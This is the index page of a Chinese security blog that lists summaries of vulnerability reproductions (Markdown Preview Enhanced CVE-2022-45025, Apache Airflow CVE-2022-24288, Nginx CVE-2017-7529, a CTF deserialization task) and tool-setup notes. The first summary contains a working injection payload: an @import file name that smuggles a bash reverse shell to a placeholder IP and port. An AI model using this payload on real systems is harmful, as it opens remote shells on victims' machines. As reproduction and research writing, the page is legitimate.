首页
新闻
博问
会员
视频
闪存
班级
所有博客
当前博客
我的博客
我的园子
账号设置
简洁模式
...
退出登录
注册
登录
sherlson
博客园
首页
新随笔
联系
订阅
管理
2022年12月16日
CVE-2022-45025 Markdown Preview Enhanced插件预览漏洞复现
摘要:
@import "$(bash -c 'bash -i >*& /dev/tcp/yourip/yourport 0>&1'| exit 0) Python.pdf" The following comment will be recognised by MPE as valid "@import"
阅读全文
posted @ 2022-12-16 12:30 sherlson
阅读(50)
评论(0)
推荐(0)
编辑
2022年11月1日
工具配置-PyCharm启动失败:java.net.BindException: Address already in use: bind
摘要: 偶尔在启动IDEA或PyCharm时,会遇到java.net.BindException: Address already in use: bind错误而无法启动。 解决办法 方式一: 重启电脑 可能会遇到多次重启电脑仍出现无法启动的情况,但是,一般绝对可行 方式二: 很多情况下,我们已经开启了很多
阅读全文
posted @ 2022-11-01 21:31 sherlson
阅读(269)
评论(0)
推荐(0)
编辑
2022年10月24日
复现-两个密码解密同一个zip文件
摘要: 前提说明:该姿势并无安全问题,短密码生成的前提是知道原密码(即文中的长密码) 前景提要 Positive Technologies 的网络安全研究员 Arseniy Sharoglazov 近日在社交平台分享了一个简单的实验并指出,加密的 ZIP 文件可能存在两个正确的密码,并且都可以提取出相同的结
阅读全文
posted @ 2022-10-24 16:02 sherlson
阅读(109)
评论(0)
推荐(0)
编辑
2022年10月9日
CVE-2022-24288 apache airflow RCE漏洞复现分析
摘要:
1. 漏洞环境 fofa key: title="Airflow - DAGs" || body="Apache Airflow" 采用本地搭建漏洞测试环境 # 获取yaml文档 curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.
阅读全文
posted @ 2022-10-09 16:46 sherlson
阅读(379)
评论(0)
推荐(0)
编辑
2022年8月10日
转载-Burp Suite Intruder模块简介
摘要:
本文转载于[Burp Suite完整教程] Intruder Attack type和Payloads – 拥有上千种姿态的攻击模式 转载本文的原因是,在实战过程中,利用Burp Suite同时探测内网C段和端口的姿势不够熟悉,转载了一篇比较完善的文章,用于自己学习,顺便记录一下。 今天要介绍Int
阅读全文
posted @ 2022-08-10 10:34 sherlson
阅读(117)
评论(0)
推荐(1)
编辑
2022年8月9日
工具配置-无法双击打开jar文件
摘要:
0x00、发现问题 重装Burp Suite时发现,使用burploader.jar进行注册破解,突然发现无法打开jar文件。 0x01、排查环境变量 首先排查JDK的环境变量,查看JAVA_HOME、CLASSPATH、PATH中的环境变量: JAVA_HOME: E:\openJDK\jdk11
阅读全文
posted @ 2022-08-09 15:13 sherlson
阅读(223)
评论(0)
推荐(0)
编辑
2022年6月18日
复现-CVE-2017-7529 Nginx 整数溢出
摘要: CVE-2017-7529 本文首发于freebuf Nginx安全性分析 影响版本:0.5.6-1.13.2 漏洞危害:敏感信息泄露 HTTP-Range HTTP的Range 允许客户端分批次请求资源的一部分,如果服务端资源较大,可以通过Range来并发下载;如果访问资源时网络中断,可以断点续传
阅读全文
posted @ 2022-06-18 15:07 sherlson
阅读(442)
评论(0)
推荐(0)
编辑
2022年6月15日
复现-2020 网鼎杯 青龙组 AreUSerialz 复现
摘要:
题目给定了以下源码: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function _
阅读全文
posted @ 2022-06-15 12:20 sherlson
阅读(69)
评论(0)
推荐(0)
编辑
2022年6月2日
随笔
摘要: 一些常用的沙箱检测 微步沙盒: https://s.threatbook.cn/ 腾讯哈勃分析系统: https://habo.qq.com/ ==》要md5,GG!!!还是算了,不太友好!!! 魔盾: https://www.maldun.com/analysis/ 微点沙盒: https://s
阅读全文
posted @ 2022-06-02 20:01 sherlson
阅读(40)
评论(0)
推荐(0)
编辑
2022年5月12日
随笔
摘要: 目前4个offer了,说明一下状况: 安恒信息 杭州 安恒云部门 安恒信息 北京 安全服务部门 奇安信 重庆 安全服务部门 中安网星 北京 安全部门 由于疫情因素,个人不是很想去北京,不过中安网星可以远程,还给配电脑,因为不是很了解中安网星,所以还是去安恒信息了。
阅读全文
posted @ 2022-05-12 13:30 sherlson
阅读(129)
评论(3)
推荐(0)
编辑
下一页
公告